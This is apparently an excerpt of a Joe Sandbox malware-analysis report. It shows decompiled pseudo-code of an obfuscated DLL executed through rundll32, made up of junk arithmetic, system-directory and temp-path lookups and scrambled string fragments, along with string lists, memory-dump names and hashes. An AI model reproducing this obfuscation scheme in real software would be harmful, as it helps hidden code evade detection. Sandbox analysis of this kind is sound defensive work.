				signed int _t364;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t386;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				void* _t400;
				void* _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t405;
				void* _t411;
				intOrPtr _t412;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t422;
				intOrPtr _t423;
				intOrPtr _t426;
				void* _t427;
				void* _t428;
				void* _t434;
				intOrPtr _t435;
				void* _t446;
				void* _t450;
				signed int _t451;
				void* _t452;
				void* _t453;
				void* _t456;

				_t260 = __ebx;
				E6E2200AC(0x6e267e6f, __ebx, __edi, __esi, 0x2c);
				_t324 =  *0x6e2c5a90; // 0xcf71e0d2
				_t127 =  *0x6e2c59d0; // 0x924fae9a
				_t261 =  *0x6e2c59d8; // 0x3040fed4
				_t380 =  *0x6e2c59dc; // 0x6
				_t358 =  *0x6e2c5a00; // 0x41f70a68
				_t405 = 0 - _t380;
				_t327 =  *0x6e2c5a90; // 0xcf71e0d2
				 *(_t400 - 0x18) = _t127 + _t324 + 0x31f;
				_t129 = _t261;
				 *(_t400 - 0x2c) = _t129;
				 *(_t400 - 0x1c) = _t380;
				if(_t405 >= 0 && (_t405 > 0 || _t358 >= _t129)) {
					_push(0);
					_t358 = _t358 - _t129 * 0x3d + 0xfffffd1c;
					 *0x6e2c5a58 =  *0x6e2c5a58 + 0xfffffd1c;
					 *0x6e2c5a00 = _t358;
					asm("adc dword [0x6e2c5a5c], 0xffffffff");
					_t380 = 0;
					asm("sbb esi, [ebp-0x1c]");
					_t261 = _t358 -  *(_t400 - 0x2c) + 0x2e4;
					 *0x6e2c59d8 = _t261;
					asm("adc esi, eax");
					 *0x6e2c59dc = 0;
				}
				 *(_t400 - 0x28) =  *0x6e2c59e6 & 0x0000ffff;
				_t131 = 0x6e2c59e6;
				 *(_t400 - 0x2c) = 0x6e2c59e6;
				 *(_t400 - 0x1c) = 0x6e2c59e6;
				do {
					if(_t358 ==  *(_t400 - 0x28)) {
						goto L8;
					} else {
						asm("cdq");
						_t133 = E6E2201E0( *_t131 & 0x0000ffff, _t327, _t261, _t380);
						_t380 = _t327;
						_t261 = _t133;
						_t327 = _t358 + 5 + _t261;
						 *0x6e2c59d8 = _t261;
						 *0x6e2c59dc = _t380;
						 *0x6e2c5a90 = _t327;
						if(_t327 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t131 =  *(_t400 - 0x1c);
							goto L8;
						}
					}
					break;
					L8:
					_t131 = _t131 + 2;
					 *(_t400 - 0x1c) = _t131;
				} while (_t131 < 0x6e2c5a44);
				_t135 = 6;
				_t411 =  *0x6e2c5a98 - _t135; // 0x6e26e664
				if(_t411 != 0) {
					L12:
					_t262 = _t261 - 0x27 +  *(_t400 - 0x18) * 0x3d;
					__eflags = _t262;
					 *0x6e2c59d8 = _t262;
					_t263 =  *(_t400 - 0x18);
					asm("sbb esi, edi");
					 *0x6e2c59dc = _t380;
				} else {
					_t412 =  *0x6e2c5a9c; // 0x0
					if(_t412 != 0) {
						goto L12;
					} else {
						_t263 = _t261 + 0x11e05;
					}
				}
				 *0x6e2c59d0 = _t263 - _t327 * 0x3d - 0x2e4;
				_t139 = GetSystemDirectoryA("C:\Windows\system32", 0x56d);
				_t381 =  *0x6e2c5a00; // 0x41f70a68
				_t266 = _t139;
				_t329 = 0;
				_t360 = 0x6e2c59e6;
				 *0x6e2c5a90 = _t139 -  *0x6e2c5a90 +  *0x6e2c59d0;
				_t142 =  *0x6e2c59e6 & 0x0000ffff;
				 *0x6e2c59d8 = _t139;
				 *(_t400 - 0x1c) = 0;
				 *0x6e2c59dc = 0;
				do {
					if(_t381 == _t142) {
						goto L17;
					} else {
						asm("cdq");
						_t266 = E6E2201E0( *_t360 & 0x0000ffff, _t329, _t266,  *(_t400 - 0x1c));
						_t256 = _t329;
						 *0x6e2c59d8 = _t266;
						 *(_t400 - 0x1c) = _t256;
						_t381 = _t381 + 5 + _t266;
						 *0x6e2c59dc = _t256;
						 *0x6e2c5a90 = _t381;
						if(_t381 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t381 =  *0x6e2c5a00; // 0x41f70a68
							_t142 =  *0x6e2c59e6 & 0x0000ffff;
							goto L17;
						}
					}
					break;
					L17:
					_t360 =  &(_t360[1]);
				} while (_t360 < 0x6e2c5a44);
				 *0x6e2c59d0 = E6E200D32();
				GetTempPathA(0x56d, "C:\Users\hardz\AppData\Local\Temp\");
				_t417 =  *0x6e2c5a04 - 0x1b47; // 0x70
				if(_t417 == 0) {
					_t318 =  *0x6e2c5a90; // 0xcf71e0d2
					_t319 = _t318 + ( *0x6e2c59e6 & 0x0000ffff);
					 *0x6e2c5a90 = _t319;
					_push(0);
					_t320 =  *0x6e2c59d8; // 0x3040fed4
					asm("adc [0x6e2c59dc], eax");
					 *0x6e2c59d8 = _t320 + 0x3b + _t319 * 2;
				}
				_t146 = E6E200D32();
				_t402 = _t401 - 0x10;
				 *0x6e2c59d0 = _t146;
				_t268 = _t402;
				 *(_t400 - 0x34) = _t402;
				_t330 = "6265";
				 *_t268 = 0;
				 *((intOrPtr*)(_t268 + 8)) = 0;
				 *((intOrPtr*)(_t268 + 0xc)) = 0;
				E6E205DAB(_t268, "6265");
				_push("Had s");
				 *(_t400 - 4) = 0;
				_t149 = E6E204197(_t260, "6265", 0, _t381);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E201E10(_t149);
				_t270 = 6;
				_t418 =  *0x6e2c5a02 - _t270; // 0x41f7
				if(_t418 == 0) {
					_t151 =  *0x6e2c59d8; // 0x3040fed4
					_t153 = _t151 + 0x11dde +  *0x6e2c59d0;
					__eflags = _t153;
					 *0x6e2c5a90 = _t153;
				} else {
					_t315 =  *0x6e2c59d8; // 0x3040fed4
					 *0x6e2c59d0 =  *0x6e2c59d0 +  ~_t315 -  *0x6e2c5a90 * 0x3d;
				}
				_push("cd Island"); // executed
				E6E24179F(_t260, _t330, 0, _t381);
				_t382 =  *0x6e2c59d0; // 0x924fae9a
				_t155 = 6;
				_t25 = _t382 - 0x338; // 0x924fab62
				_t272 = _t25;
				 *0x6e2c5a90 = _t272;
				_t419 =  *0x6e2c5a02 - _t155; // 0x41f7
				if(_t419 == 0) {
					_t331 =  *0x6e2c5a00; // 0x41f70a68
					_t156 = 0;
					 *0x6e2c59dc = 0;
					_t333 = _t331 + 0x11dde + _t272;
					__eflags = _t333;
					 *0x6e2c59d8 = _t333;
				} else {
					_t333 =  *0x6e2c59d8; // 0x3040fed4
					_t156 =  *0x6e2c59dc; // 0x6
					 *0x6e2c5a90 = _t272 - _t333 * 0x3d -  *0x6e2c5a00;
				}
				_push(_t156);
				_push(_t333);
				_push(_t382);
				E6E204401(_t260, E6E204401(_t260, E6E201FF2(_t260, E6E2020D9(_t260, E6E204267(_t260, 0, _t382, _t419), _t333, 0, _t382), _t333, 0, _t382), 0x6e2c8150, 0, _t382, _t419), "part ", 0, _t382, _t419);
				_t336 =  *0x6e2c5a00; // 0x41f70a68
				_t277 = 0x6e2c5a0e;
				_t362 =  *0x6e2c59dc; // 0x6
				_t383 =  *0x6e2c59d8; // 0x3040fed4
				do {
					if(_t336 != ( *0x6e2c59e2 & 0x0000ffff)) {
						 *_t277 =  *_t277 + _t336;
						_t26 = _t336 + 5; // 0x41f70a6d
						_t245 = _t26 + _t383;
						 *0x6e2c5a90 = _t245;
						_t383 = _t383 + _t245 + 0x3b + _t336;
						_push(0);
						asm("adc edi, eax");
					}
					_t277 = _t277 - 4;
				} while (_t277 > 0x6e2c59e2);
				_push("cd Matter m");
				 *0x6e2c59d8 = _t383;
				 *0x6e2c59dc = _t362; // executed
				E6E24179F(_t260, _t336, _t362, _t383); // executed
				_t164 = 6;
				_t422 =  *0x6e2c5a98 - _t164; // 0x6e26e664
				if(_t422 != 0) {
					L34:
					 *0x6e2c59d8 =  *0x6e2c59d8 - 0x27 +  *0x6e2c59d0 * 0x3d;
					asm("sbb [0x6e2c59dc], ecx");
				} else {
					_t423 =  *0x6e2c5a9c; // 0x0
					if(_t423 != 0) {
						goto L34;
					} else {
						_t242 =  *0x6e2c59d8; // 0x3040fed4
						 *0x6e2c59d0 = _t242 + 0x11e05;
					}
				}
				_t403 = _t402 - 0x10;
				 *(_t400 - 0x34) = _t403;
				 *0x6e2c5a90 =  *0x6e2c5a90 * 0x29266b;
				_t168 = _t403;
				 *_t168 = 5;
				 *((intOrPtr*)(_t168 + 8)) = 0x5c7;
				 *((intOrPtr*)(_t168 + 0xc)) = 0;
				_push("Molecul");
				 *(_t400 - 4) = 1;
				_t169 = E6E204197(_t260, _t336, _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E201E10(_t169);
				_t281 = 0x27;
				_t171 = E6E200EF6(_t281);
				_t404 = _t403 - 0x10;
				 *0x6e2c59d8 = _t171;
				_t282 = _t404;
				 *(_t400 - 0x34) = _t404;
				 *0x6e2c59dc = 0;
				 *_t282 = 0;
				 *((intOrPtr*)(_t282 + 8)) = 0;
				 *((intOrPtr*)(_t282 + 0xc)) = 0;
				E6E205DAB(_t282, "6623");
				_push("out drop ");
				 *(_t400 - 4) = 2;
				_t174 = E6E204197(_t260, "6623", _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E201E10(_t174);
				_t176 =  *0x6e2c59dc; // 0x6
				 *(_t400 - 0x18) =  *0x6e2c59d8 * 0x36 +  *0x6e2c5a90;
				_t286 =  *0x6e2c5a90 * 0x10e1d;
				_t178 =  *0x6e2c59d8; // 0x3040fed4
				_t287 = 0x6e2c5a28;
				 *0x6e2c59d8 = _t178 * _t286;
				_t340 =  *0x6e2c5a90; // 0xcf71e0d2
				_t180 =  *0x6e2c59d0; // 0x924fae9a
				 *0x6e2c59dc = _t176 * _t286 + (_t178 * _t286 >> 0x20);
				_t386 =  *(_t400 - 0x18);
				_t342 = _t340 + _t386 + _t180 + 0x3b;
				do {
					if( *0x6e2c5a28 != 0x27) {
						L38:
						_t183 =  *_t287 * _t342;
						 *0x6e2c59dc = 0;
						_t342 = _t183;
						_t184 = _t183 + 0x2c;
						 *0x6e2c59d8 = _t184;
						_t427 = _t184 -  *0x6e2c5a50; // 0x4e
						if(_t427 != 0) {
							goto L40;
						} else {
							_t428 = 0 -  *0x6e2c5a54; // 0x0
							if(_t428 != 0) {
								goto L40;
							}
						}
					} else {
						_t426 =  *0x6e2c5a2c; // 0x0
						if(_t426 == 0) {
							goto L40;
						} else {
							goto L38;
						}
					}
					break;
					L40:
					_t287 =  &(_t287[2]);
				} while (_t287 < "or@std@@");
				_t185 = E6E200D32();
				_t364 =  *0x6e2c5a90; // 0xcf71e0d2
				_t49 = _t386 + 0x11dde; // 0x11dde
				 *(_t400 - 0x1c) = _t185;
				 *(_t400 - 0x28) = _t49 + _t364;
				_t291 = _t185 * 0x10e1d;
				_t186 =  *0x6e2c59dc; // 0x6
				_t188 =  *0x6e2c59d8; // 0x3040fed4
				_t190 =  *0x6e2c59f2 & 0x0000ffff;
				 *(_t400 - 0x10) = _t188 * _t291;
				_t346 =  *0x6e2c59e6; // 0x8145
				 *(_t400 - 0x14) = _t186 * _t291 + (_t188 * _t291 >> 0x20);
				 *(_t400 - 0x34) = _t190;
				if((_t346 & 0x0000ffff) + _t190 != 0x32) {
					_t389 =  *(_t400 - 0x18) * 0x29266b;
					_t191 = _t389 * 0x37;
					__eflags = _t191;
					 *(_t400 - 0x1c) = _t191;
					_t294 = _t191;
					 *(_t400 - 0x20) = _t191;
				} else {
					_t294 =  *(_t400 - 0x1c);
					 *(_t400 - 0x20) = _t294;
					_t389 = _t294 -  *(_t400 - 0x18) *  *(_t400 - 0x18) * 0x10e1d + 0x27;
				}
				 *(_t400 - 0x30) = _t346 & 0x0000ffff;
				_t193 = 0x6e2c59e6;
				 *(_t400 - 0x18) = _t389;
				_t390 =  *(_t400 - 0x10);
				 *(_t400 - 0x24) = 0x6e2c59e6;
				do {
					if(_t294 ==  *(_t400 - 0x30)) {
						_t346 =  *(_t400 - 0x14);
						goto L48;
					} else {
						asm("cdq");
						_t195 = E6E2201E0( *_t193 & 0x0000ffff, _t346, _t390,  *(_t400 - 0x14));
						_t294 =  *(_t400 - 0x20);
						_t390 = _t195;
						 *(_t400 - 0x14) = _t346;
						_t364 = _t294 + 5 + _t390;
						 *0x6e2c5a90 = _t364;
						if(_t364 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t193 =  *(_t400 - 0x24);
							goto L48;
						}
					}
					break;
					L48:
					_t193 =  &(_t193[1]);
					 *(_t400 - 0x24) = _t193;
				} while (_t193 < 0x6e2c5a44);
				_t197 = 6;
				 *(_t400 - 0x10) = _t390;
				_t391 =  *(_t400 - 0x18);
				_t434 =  *0x6e2c5a98 - _t197; // 0x6e26e664
				if(_t434 != 0) {
					L53:
					_push(0);
					_t296 =  *(_t400 - 0x10) - 0x27 +  *(_t400 - 0x28) * 0x3d;
					__eflags = _t296;
					asm("sbb edx, eax");
					_t201 =  *(_t400 - 0x28);
				} else {
					_t435 =  *0x6e2c5a9c; // 0x0
					if(_t435 != 0) {
						goto L53;
					} else {
						_t296 =  *(_t400 - 0x10);
						_t83 = _t296 + 0x11e05; // 0x11e05
						_t201 = _t83;
					}
				}
				 *(_t400 - 0x30) = _t364;
				if( *(_t400 - 0x34) > _t364) {
					_t202 =  *(_t400 - 0x30);
				} else {
					 *0x6e2c59e0 = _t201;
					_t364 = _t364 + 2 + _t201 * 0x6d;
					 *0x6e2c5a90 = _t364;
					_t202 = _t364;
				}
				 *(_t400 - 0x14) = 0x6e2c5a0e;
				_t393 =  *(_t400 - 0x1c);
				_t297 = _t296 + _t202 + _t296 + _t391 + 0x3d;
				_push(0);
				asm("adc edx, eax");
				 *0x6e2c59d8 = _t297;
				 *0x6e2c59dc = _t346;
				do {
					if(_t393 != ( *0x6e2c59e2 & 0x0000ffff)) {
						_t94 = _t393 + 5; // 0x41f5ec8f
						_t364 = _t94 + _t297;
						_push(0);
						 *0x6e2c5a90 = _t364;
						 *( *(_t400 - 0x14)) =  *( *(_t400 - 0x14)) + _t393;
						_t95 = _t393 + 0x3b; // 0x41f5ecc5
						_t297 = _t297 + _t95 + _t364;
						asm("adc edx, eax");
						 *0x6e2c59d8 = _t297;
						 *0x6e2c59dc = _t346;
					}
					_t208 =  *(_t400 - 0x14) - 4;
					 *(_t400 - 0x14) = _t208;
				} while (_t208 > 0x6e2c59e2);
				_t394 =  *(_t400 - 0x18);
				_t209 = 0x6e2c59e6;
				 *(_t400 - 0x10) = _t297;
				_t298 =  *0x6e2c59e6 & 0x0000ffff;
				 *(_t400 - 0x14) = _t346;
				do {
					_t347 = _t364;
					if(_t347 == _t298) {
						goto L65;
					} else {
						_t364 = ( *_t209 & 0x0000ffff) * _t347;
						_t347 = _t364;
						 *0x6e2c5a90 = _t364;
						if(5 + _t347 * 2 != ( *0x6e2c59f0 & 0x0000ffff)) {
							_t209 =  *(_t400 - 0x2c);
							_t298 =  *0x6e2c59e6 & 0x0000ffff;
							goto L65;
						}
					}
					break;
					L65:
					_t209 = _t209 + 2;
					 *(_t400 - 0x2c) = _t209;
				} while (_t209 < 0x6e2c5a44);
				_t105 = _t394 + 2; // 0x2
				 *0x6e2c59d0 = _t105 + _t347;
				_t213 = E6E201029(_t394);
				_t300 =  *0x6e2c5a90; // 0xcf71e0d2
				_t106 = _t394 + 2; // 0x2
				_t369 = _t106 + _t300;
				 *0x6e2c5a00 = _t213;
				_t348 = _t300;
				if(_t300 >= _t369) {
					_t300 = _t369 * 0xffffffc3;
					 *0x6e2c59f2 =  *0x6e2c59f2 - _t300;
					_t348 = _t300;
				}
				_t107 = _t213 + 2; // 0x2
				_t371 = _t107 + _t348;
				 *0x6e2c59d0 = _t371;
				_t446 =  *0x6e2c5a04 - 0x1b47; // 0x70
				if(_t446 != 0) {
					_t349 =  *(_t400 - 0x10);
				} else {
					_t300 = ( *0x6e2c59e6 & 0x0000ffff) + _t348;
					_push(0);
					_t349 =  *(_t400 - 0x10) + 0x3b + _t300 * 2;
					asm("adc edi, eax");
					 *0x6e2c59d8 = _t349;
					 *0x6e2c59dc =  *(_t400 - 0x14);
					_t371 =  *0x6e2c59d0; // 0x924fae9a
				}
				_t395 = 0x6e2c5a0e;
				do {
					if(_t300 != ( *0x6e2c59e2 & 0x0000ffff)) {
						 *_t395 =  *_t395 + _t300;
						_t229 = _t300 + _t300;
						_t114 = _t229 + 5; // 0x5
						_t371 = _t114;
						_t115 = _t229 + 0x3b; // 0x3b
						_t300 = _t115 + _t371;
					}
					_t395 = _t395 - 4;
					_t216 = _t300;
				} while (_t395 > 0x6e2c59e2);
				_t396 =  *(_t400 - 0x18);
				_t301 = 6;
				 *0x6e2c59d0 = _t371;
				_t450 =  *0x6e2c5a02 - _t301; // 0x41f7
				if(_t450 != 0) {
					_t375 = _t371 + _t216 * 0xffffffc2;
					_t451 = _t375;
					 *0x6e2c59d0 = _t375;
				}
				_t117 = _t396 + 7; // 0x7
				 *0x6e2c5a90 = _t117 + _t349 * 2;
				E6E1FFB4A(_t396, _t451);
				_t350 =  *0x6e2c5a00; // 0x41f70a68
				_t303 = 0x6e2c5ac8;
				_t372 =  *0x6e2c59d8; // 0x3040fed4
				do {
					_t452 = _t396 -  *0x6e2c5a18; // 0x4c
					if(_t452 != 0) {
						L80:
						_t120 = _t396 + 5; // 0x5
						 *0x6e2c59dc = 0;
						_t372 = _t120 + _t350;
						 *_t303 =  *_t303 + _t396;
						 *0x6e2c59d8 = _t372;
						asm("adc [ecx+0x4], eax");
						_t122 = _t396 + 0x3b; // 0x3b
						_t350 = _t122 + _t350 + _t372;
						 *0x6e2c5a00 = _t350;
					} else {
						_t453 = 0 -  *0x6e2c5a1c; // 0x0
						if(_t453 != 0) {
							goto L80;
						}
					}
					_t303 = _t303 - 0x10;
				} while (_t303 > 0x6e2c5a18);
				_t222 =  *0x6e2c59dc; // 0x6
				_t456 = 0 - _t222;
				if(_t456 >= 0 && (_t456 > 0 || _t350 >= _t372)) {
					_push(0);
					_t354 = _t350 - _t372 * 0x3d - _t396;
					 *0x6e2c5a58 =  *0x6e2c5a58 - _t396;
					asm("sbb [0x6e2c5a5c], eax");
					 *0x6e2c5a00 = _t354;
					asm("sbb ecx, [0x6e2c59dc]");
					_t372 = _t354 - _t372 + _t396;
					 *0x6e2c59d8 = _t372;
					asm("adc ecx, eax");
					 *0x6e2c59dc = 0;
				}
				_t305 =  *0x6e2c5a90; // 0xcf71e0d2
				_t306 =  *0x6e2c59d0; // 0x924fae9a
				 *0x6e2c59d0 = _t306 + 0x3d + _t372 + _t305 * 2;
				return E6E220075(1);
			}

APIs

__EH_prolog3.LIBCMT ref: 6E20128C
GetSystemDirectoryA.KERNEL32 ref: 6E2013C5
GetTempPathA.KERNEL32(0000056D,C:\Users\user\AppData\Local\Temp\,?,6E21FF71,?,00000001,?,?,00000001,?,6E2C27E0,0000000C,6E22006E,?,00000001,?), ref: 6E201468

Strings

6265, xrefs: 6E2014CB
Y,n, xrefs: 6E201915
DZ,n, xrefs: 6E20136C
(Z,n, xrefs: 6E20170E
C:\Windows\system32, xrefs: 6E2013B2
C:\Users\user\AppData\Local\Temp\, xrefs: 6E201459
DZ,n, xrefs: 6E201967
cd Matter m, xrefs: 6E201607
Y,n, xrefs: 6E201A11
cd Island, xrefs: 6E201531
Y,n, xrefs: 6E201801
Molecul, xrefs: 6E20167E
DZ,n, xrefs: 6E20184B
Y,n, xrefs: 6E201320
Y,n, xrefs: 6E2013E1
part , xrefs: 6E2015B5
6623, xrefs: 6E2016B1
Y,n, xrefs: 6E20191F
Had s, xrefs: 6E2014DF
DZ,n, xrefs: 6E20144C
out drop , xrefs: 6E2016C8
Y,n, xrefs: 6E2015FF

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: DirectoryH_prolog3PathSystemTemp
String ID: (Z,n$6265$6623$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$DZ,n$DZ,n$DZ,n$DZ,n$Had s$Molecul$cd Island$cd Matter m$out drop $part $Y,n$Y,n$Y,n$Y,n$Y,n$Y,n$Y,n
API String ID: 3607090873-464011853
Opcode ID: 1ec597e508b1389623b27b9f2332c2d0fe6531852423472695b85293070f7f77
Instruction ID: 728cb7aee2a600c8191dd4e8088b25b04de57e2a826a6255d42a11b98fbc2278
Opcode Fuzzy Hash: 1ec597e508b1389623b27b9f2332c2d0fe6531852423472695b85293070f7f77
Instruction Fuzzy Hash: 0132C371A8161A8FCF84CFA9C49D5AD77F3BB89B14B24456BD405DB780E730E980CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1FFB4A, Relevance: 14.6, APIs: 1, Strings: 8, Instructions: 1094
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1FFB4A(intOrPtr __ecx, void* __eflags) {
				signed int _v1;
				signed int _v2;
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed char _v64;
				intOrPtr _v68;
				void* __ebx;
				signed int _t321;
				signed char _t324;
				signed short _t327;
				signed short _t344;
				void* _t346;
				signed short _t352;
				void* _t358;
				signed int _t360;
				signed short _t365;
				signed int _t367;
				signed char _t370;
				signed int _t377;
				signed int _t380;
				signed int _t383;
				signed int _t386;
				signed int _t387;
				void* _t398;
				signed char _t402;
				signed char _t403;
				signed int _t405;
				signed int _t406;
				signed char _t410;
				void* _t414;
				signed int _t415;
				void* _t419;
				signed int _t428;
				signed int _t431;
				signed char _t434;
				void* _t437;
				signed char _t440;
				signed int _t441;
				void* _t450;
				signed short _t456;
				signed int _t457;
				signed int _t461;
				void* _t462;
				signed int _t465;
				signed int _t470;
				signed int _t472;
				signed int _t477;
				signed char _t479;
				signed int _t486;
				signed int _t494;
				signed short _t500;
				void* _t502;
				signed int _t505;
				signed short _t508;
				signed int _t513;
				signed int _t516;
				void* _t519;
				void* _t522;
				signed char _t524;
				signed int _t528;
				signed char _t532;
				signed short _t535;
				signed int _t544;
				signed int _t547;
				signed short _t551;
				void* _t560;
				signed short _t567;
				intOrPtr _t569;
				signed char _t570;
				signed char _t583;
				signed int _t584;
				signed int _t593;
				signed char _t600;
				void* _t610;
				signed char _t611;
				signed int _t639;
				signed int _t648;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				signed int _t654;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t665;
				void* _t666;
				signed int _t669;
				signed int _t672;
				signed char _t674;
				signed char _t675;
				void* _t680;
				signed char _t681;
				signed char _t684;
				void* _t692;
				signed char _t694;
				signed char _t695;
				void* _t698;
				signed int _t713;
				signed int _t718;
				signed int _t720;
				signed short* _t722;
				signed int _t723;
				void* _t725;
				intOrPtr* _t726;
				signed int _t728;
				signed int _t729;
				signed char _t733;
				signed int _t736;
				void* _t737;
				signed int _t738;
				signed char _t740;
				signed char _t743;
				signed int _t748;
				signed int _t754;
				signed int _t757;
				signed int _t759;
				signed int _t761;
				signed int _t766;
				signed char _t772;
				signed int _t785;
				signed int _t793;
				signed short _t798;
				signed int _t808;
				signed int _t813;
				signed int _t817;
				signed char _t818;
				signed int _t819;
				signed int _t827;
				signed short* _t841;
				signed int _t842;
				signed int _t843;
				signed int _t845;
				signed short _t848;
				signed short _t849;
				signed char _t851;
				signed int _t852;
				signed char _t854;
				signed char _t855;
				signed int _t856;
				signed int _t858;
				signed char _t863;
				signed int _t866;
				signed int _t872;
				signed short _t877;
				signed int _t879;
				signed int _t881;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed short _t886;
				signed int _t888;
				signed short _t892;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				void* _t903;
				signed short _t904;
				signed short _t905;
				signed int _t906;
				void* _t908;
				signed int _t910;
				signed int _t912;
				signed short _t915;
				signed int _t919;
				void* _t923;
				signed int _t930;
				void* _t948;
				void* _t964;
				void* _t968;

				_t321 =  *0x6e2c5a90; // 0xcf71e0d2
				 *0x6e2c59f2 =  *0x6e2c59f2 - _t321;
				_v60 = _t321;
				_v68 = __ecx;
				_t324 = E6E1FFA83();
				 *0x6e2dc8d0 = 0x6e2c86a0;
				_v64 = _t324;
				 *0x6e2c5a04 = _t324 - _v60 - 0x54;
				_t327 = E6E1FF7A5();
				_t713 =  *0x6e2c5a90; // 0xcf71e0d2
				_t898 =  *0x6e2c59e6 & 0x0000ffff;
				_t879 =  *0x6e2c5a00; // 0x41f70a68
				_t648 = _v60;
				_v8 = _t327 & 0x0000ffff;
				_v28 = 0x6e2c59e6;
				_t841 = 0x6e2c59e6;
				_v56 = _t713;
				do {
					if(_t879 == _t898) {
						goto L3;
					}
					_t9 = _t879 + 5; // 0x41f70a6d
					_t648 = _t648 * ( *_t841 & 0x0000ffff);
					_t713 = _t9 + _t648;
					 *0x6e2c5a90 = _t713;
					if(_t713 == ( *0x6e2c59f0 & 0x0000ffff)) {
						break;
					}
					L3:
					_t841 =  &(_t841[1]);
				} while (_t841 < 0x6e2c5a44);
				_v56 = _t713;
				_t651 = _v64 - ( *0x6e2c5a04 & 0x000000ff) * 0x3d - _t713;
				 *0x6e2c59d0 = _t651;
				 *0x6e2c5a04 = _t651 - _t713 - 0x54;
				if(_t651 >= _t713) {
					_t877 = _v8;
					 *0x6e2c59f2 =  *0x6e2c59f2 - _t877;
					_t930 = _t877 & 0x0000ffff;
					_t651 = _t651 - _t713 * 0x3d - _t930;
					 *0x6e2c59d0 = _t651;
					 *0x6e2c5a90 = _t651 - _t713 + _t930;
				}
				E6E1FFA83();
				_t842 =  *0x6e2c59d0; // 0x924fae9a
				_t652 = _v56;
				 *0x6e2c5a04 = _t842 -  *0x6e2c5a04 + _t652;
				_v40 = _t842;
				if(( *0x6e2c59e6 & 0x0000ffff) + ( *0x6e2c59f2 & 0x0000ffff) != 0x32) {
					_t718 = _t879 *  *0x6e2c5a90 * 0x10e1d;
					_t652 = _t718 * 0x37;
					__eflags = _t652;
				} else {
					_t639 =  *0x6e2c5a90; // 0xcf71e0d2
					_t718 = _t879 - _t639 * _t639 * 0x10e1d + _t652;
				}
				 *0x6e2c5a90 = _t718;
				_t344 = E6E1FF7A5();
				_t899 =  *0x6e2c5a90; // 0xcf71e0d2
				_t720 = _v40;
				_v8 = _t344 & 0x0000ffff;
				_t843 = _v8 & 0x0000ffff;
				_t346 = 0xffffffac;
				_t653 = _t652 + _t346 - _t899;
				if(_t720 >= _t899) {
					 *0x6e2c59f2 =  *0x6e2c59f2 - _v8;
					_t720 = _t720 - _t899 * 0x3d - _t843;
					 *0x6e2c59d0 = _t720;
					 *0x6e2c5a90 = _t720 - _t899 + _t843;
				}
				_v40 = _t720;
				E6E1FF8B8(_t720, _t843);
				 *0x6e2c5a04 = _v40 - _t653 - 0x54;
				_t352 = E6E1FFA83();
				_t900 =  *0x6e2c59e6 & 0x0000ffff;
				_t722 = _v28;
				_t845 =  *0x6e2c5a90; // 0xcf71e0d2
				_v64 = _t352 & 0x0000ffff;
				do {
					if(_t879 == _t900) {
						goto L14;
					}
					_t23 = _t879 + 5; // 0x41f70a6d
					_t653 = _t653 * ( *_t722 & 0x0000ffff);
					_t845 = _t23 + _t653;
					if(_t845 == ( *0x6e2c59f0 & 0x0000ffff)) {
						break;
					}
					L14:
					_t722 =  &(_t722[1]);
				} while (_t722 < 0x6e2c5a44);
				 *0x6e2c5a90 = _t845;
				_v36 = 0x2541188;
				_v52 = 0x2541188;
				_t901 = _v64 & 0x0000ffff;
				_t358 = 6;
				_t948 =  *0x6e2c5a02 - _t358; // 0x41f7
				if(_t948 == 0) {
					_t28 = _t901 + 0x11dde; // 0xcf72feb0
					_t360 = _t28 + _t845;
					__eflags = _t360;
					_v16 = _t360;
					_t723 = _t360;
				} else {
					_t723 =  *0x6e2c59d0; // 0x924fae9a
					_v16 = _t723;
					 *0x6e2c5a90 = _t845 +  ~_t901 - _t723 * 0x3d;
				}
				 *0x6e2c5a04 = _t723 - _t653 - 0x54;
				_t365 = E6E1FF7A5() & 0x0000ffff;
				_v20 = _t365;
				_v8 = _t365;
				_v44 = _t365 & 0x0000ffff;
				_t367 =  *0x6e2c5a90; // 0xcf71e0d2
				_v60 = 0xf;
				_v64 = 0xb4;
				_t36 = _t367 + 0x3b; // 0xcf71e10d
				_t725 = _t36 + _t653 * 2;
				_t654 =  *0x6e2c5a90; // 0xcf71e0d2
				_t370 = _v16 - _t725 - 0x54;
				_v12 = _t370;
				_t881 = (_t370 & 0x000000ff) * 0x36 + _t725;
				_v24 = _t881;
				 *0x6e2c5a00 = _t881;
				if(( *0x6e2c59f2 & 0x0000ffff) <= _t881) {
					 *0x6e2c59e0 = _t654;
